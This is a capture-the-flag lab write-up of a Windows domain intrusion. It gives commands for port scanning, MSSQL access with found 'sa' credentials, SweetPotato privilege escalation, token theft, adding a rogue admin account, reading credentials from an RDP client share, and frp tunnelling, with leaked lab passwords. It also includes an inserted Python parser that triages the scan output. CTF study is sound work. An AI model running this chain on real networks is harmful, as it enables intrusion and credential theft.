春秋云镜 Tsclient

mssql

First download fscan and run a scan. This is a Windows target, so just download the exe.

.\fscan.exe -h 39.98.109.127 -p 1-65535

The scan turns up an MSSQL service; install a tool to connect to it.

Download the first one. I'm on Java 1.8, so it connected right away.

java -jar Multiple.Database.Utilization.Tools-2.1.1-jar-with-dependencies.jar


whoami shows a very low-privileged account. Upload SweetPotato (download the first one) and run commands through it.

C:/迅雷下载/SweetPotato.exe -a whoami

With elevated privileges, go straight to C:/Users/Administrator/

C:/迅雷下载/SweetPotato.exe -a "dir C:\Users\Administrator\"
C:/迅雷下载/SweetPotato.exe -a "dir C:\Users\Administrator\flag\"
C:/迅雷下载/SweetPotato.exe -a "type C:\Users\Administrator\flag\flag01.txt"

Then we can move into the intranet.

Intranet

C:/迅雷下载/SweetPotato.exe -a "ipconfig"

C:/迅雷下载/SweetPotato.exe -a "C:\迅雷下载\fscan.exe -h 172.22.8.18/24"
Modifying SweetPotato by Uknow to support webshell
Github: https://github.com/uknowsec/SweetPotato
SweetPotato by @_EthicalChaos_
Original RottenPotato code and exploit by @foxglovesec
Weaponized JuicyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n

[+] Attempting NP impersonation using method PrintSpoofer to launch c:\Windows\System32\cmd.exe
[+] Triggering notification on evil PIPE \\WIN-WEB/pipe/20cbde11-b9fd-41d3-b6f2-b42a5bb2829f
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] CreatePipe success
[+] Command: "c:\Windows\System32\cmd.exe" /c C:\迅雷下载\fscan.exe -h 172.22.8.18/24
[+] Process with PID: 6976 created.

=====================================

start infoscan

(icmp) Target 172.22.8.18 is alive
(icmp) Target 172.22.8.15 is alive
(icmp) Target 172.22.8.31 is alive
(icmp) Target 172.22.8.46 is alive

[*] Icmp alive hosts len is: 4

172.22.8.31:135 open
172.22.8.46:135 open
172.22.8.18:139 open
172.22.8.15:135 open
172.22.8.18:135 open
172.22.8.15:139 open
172.22.8.46:80 open
172.22.8.18:80 open
172.22.8.15:88 open
172.22.8.46:445 open
172.22.8.31:445 open
172.22.8.18:1433 open
172.22.8.15:445 open
172.22.8.18:445 open
172.22.8.46:139 open
172.22.8.31:139 open

[*] Alive ports len is: 16

start vulscan

[*] NetInfo
[*] 172.22.8.18
[->] WIN-WEB
[->] 172.22.8.18
[->] 2001:0:348b:fb58:83f:175d:d89d:9280

[*] NetInfo
[*] 172.22.8.31
[->] WIN19-CLIENT
[->] 172.22.8.31

[*] NetBios 172.22.8.31 XIAORANG\WIN19-CLIENT

[*] NetInfo
[*] 172.22.8.15
[->] DC01
[->] 172.22.8.15

[*] NetInfo
[*] 172.22.8.46
[->] WIN2016
[->] 172.22.8.46

[*] NetBios 172.22.8.15 [+] DC:XIAORANG\DC01

[*] NetBios 172.22.8.46 WIN2016.xiaorang.lab Windows Server 2016 Datacenter 14393

[*] WebTitle http://172.22.8.46 code: 200 len: 703 title: IIS Windows Server
[*] WebTitle http://172.22.8.18 code: 200 len: 703 title: IIS Windows Server

[+] mssql 172.22.8.18:1433: sa 1qaz!QAZ

Scan finished 16/16

[*] Scan completed, elapsed time: 10.0628104s

[+] Process created, enjoy!

The situation is as follows:

  1. 172.22.8.15 domain controller
  2. 172.22.8.31 domain member
  3. 172.22.8.18 already compromised
  4. 172.22.8.46 domain member
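The fscan output above is line-oriented and easy to fold into a per-host inventory, which is what a defender receiving such a scan would do first: work out which host is the DC and which findings need attention. This parser and triage step are an added example, not part of the original write-up or of fscan itself; the sample lines are constructed to match the output format shown above, with the sa password replaced by a placeholder.

```python
import re
from collections import defaultdict

# Constructed sample modelled on the fscan output quoted in this write-up.
SAMPLE = """\
(icmp) Target 172.22.8.18 is alive
(icmp) Target 172.22.8.15 is alive
172.22.8.15:88 open
172.22.8.15:445 open
172.22.8.18:445 open
172.22.8.18:1433 open
[*] NetBios 172.22.8.15 [+] DC:XIAORANG\\DC01
[*] WebTitle http://172.22.8.18 code: 200 len: 703 title: IIS Windows Server
[+] mssql 172.22.8.18:1433: sa PASSWORD-PLACEHOLDER
"""

ALIVE_RE = re.compile(r"^\(icmp\) Target (\S+) is alive$")
PORT_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d+) open$")
NETBIOS_RE = re.compile(r"^\[\*\] NetBios (\S+) (.+)$")
WEB_RE = re.compile(r"^\[\*\] WebTitle https?://([^/:\s]+)\S* code: (\d+) .*title: (.*)$")
CRED_RE = re.compile(r"^\[\+\] (\w+) ([\d.]+):(\d+): (\S+) \S+$")  # password not captured

def new_host():
    return {"alive": False, "ports": set(), "netbios": "", "web": [], "creds": []}

def parse_fscan(text):
    """Fold fscan's line-oriented output into one record per host."""
    hosts = defaultdict(new_host)
    for raw in text.splitlines():
        line = raw.strip()
        if m := ALIVE_RE.match(line):
            hosts[m[1]]["alive"] = True
        elif m := PORT_RE.match(line):
            hosts[m[1]]["ports"].add(int(m[2]))
        elif m := NETBIOS_RE.match(line):
            hosts[m[1]]["netbios"] = m[2]
        elif m := WEB_RE.match(line):
            hosts[m[1]]["web"].append((int(m[2]), m[3]))
        elif m := CRED_RE.match(line):
            hosts[m[2]]["creds"].append((m[1], int(m[3]), m[4]))
    return dict(hosts)

def triage(hosts):
    """Label each host and list the findings a defender should fix first."""
    report = {}
    for ip, h in hosts.items():
        role = "domain-controller" if ("DC:" in h["netbios"] or 88 in h["ports"]) else "member"
        issues = [f"{svc}/{port}: '{user}' accepts a guessable password" for svc, port, user in h["creds"]]
        if 1433 in h["ports"]:
            issues.append("MSSQL 1433 reachable from the scanning host")
        if h["web"]:
            issues.append("HTTP exposed: " + ", ".join(t for _, t in h["web"]))
        report[ip] = (role, issues)
    return report
```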

Look at the users:

C:/迅雷下载/SweetPotato.exe -a "net user"

Administrator
DefaultAccount
Guest

John

Look at the network:

C:/迅雷下载/SweetPotato.exe -a "netstat -no"

We can see that port 3389 on the machine we are on has a connection from 172.22.8.31, which is a domain-joined machine. Install SharpToken.exe to take John's user token.

C:/迅雷下载/SweetPotato.exe -a "C:\迅雷下载\SharpToken.exe execute "WIN-WEB\John" cmd true"
C:/迅雷下载/SweetPotato.exe -a "net use"

No response at all, so we have to create a user and connect remotely. The password must be complex enough, otherwise user creation fails. There is no need to change the registry; changing it may still not work.

C:/迅雷下载/SweetPotato.exe -a "net user test1 12SqweR!@ /add"
C:/迅雷下载/SweetPotato.exe -a "net localgroup administrators test1 /add"

For convenience, make a bat file:

@echo off
rem Set the Java 8 paths
SET JAVA8_JRE=C:\Program Files\Java\jdk1.8.0_201\jre\bin
SET JAVA8_JDK=C:\Program Files\Java\jdk1.8.0_201\bin

rem Temporarily modify PATH so the Java 8 JDK and JRE take effect
SET PATH=%JAVA8_JDK%;%JAVA8_JRE%;%PATH%

rem Run the JAR file
java -jar Multiple.Database.Utilization.Tools-2.1.1-jar-with-dependencies.jar

rem Pause to view the output
pause

Run mstsc and connect remotely. Once connected we need to get the John user, so open cmd as administrator:

SharpToken.exe execute "WIN-WEB\John" cmd true

It won't run; installing .NET 3.5 fixes it. Search for "Server Manager" to open it.

Server Manager -> Manage -> Add Roles and Features -> Features -> check .NET 3.5 and install. After it is installed:

net use
dir \\TSCLIENT\C
type \\TSCLIENT\C\credential.txt

We get:

xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#
Do you know how to hijack Image?

Then I couldn't log in and had to change the password, which needs frps, but I don't know frps. Then run this on the server:

./frps -c frps.ini

Then visit port 7500 on the server and log in. Windows download address; after uploading it, write an frpc.ini:

[common]
server_addr = your server's public IP
server_port = 7000
token = baozongwi123!@

[web]
type = http
local_port = 80
custom_domains = example.com